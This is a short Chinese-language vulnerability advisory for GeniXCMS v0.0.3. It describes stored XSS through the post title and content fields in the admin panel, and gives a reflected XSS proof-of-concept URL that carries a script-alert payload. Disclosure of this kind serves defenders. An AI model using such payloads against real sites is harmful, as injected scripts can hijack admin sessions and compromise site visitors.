<p># 漏洞标题:持续性XSS<br></p><p># 厂商主页: genixcms.org</p><p># 软件链接: genixcms.org</p><p># 版本: 0.0.3</p><p># 测试于: windows 7</p><p># 类别: web应用</p><p> </p><p> </p><p>厂商:</p><p>=============================================</p><p>genixcms.org</p><p><br></p><p>产品:</p><p>=====================================================</p><p>GeniXCMS v0.0.3 是一个基于PHP的管理系统<br></p><p> </p><p>咨询信息:</p><p>===================================================</p><p>多个持续型&反射型 XSS 漏洞<br></p><p><br></p><p>漏洞详情:</p><p>=========================================================</p><p>GeniXCMS v0.0.3有持续型和反射型XSS漏洞 </p><p> </p><p>XSS利用代码:</p><p>====================</p><p> </p><p>持续型XSS:</p><p>-----------------------</p><p><a href="http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&act=add&token=" rel="nofollow">http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&act=add&token=</a></p><p> </p><p>1-内容写入点</p><p>内容注入XSS将在提交被公开之后执行</p><p> </p><p>2-标题写入点</p><p>标题注入XSS将立即执行<br></p><p> </p><p> </p><p>反射型XSS:</p><p>---------------------</p><p><a href="http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&q=1" rel="nofollow">http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&q=1</a>'<script>alert('XSS By Hyp3rlinx')</script></p><p> </p>
暂无评论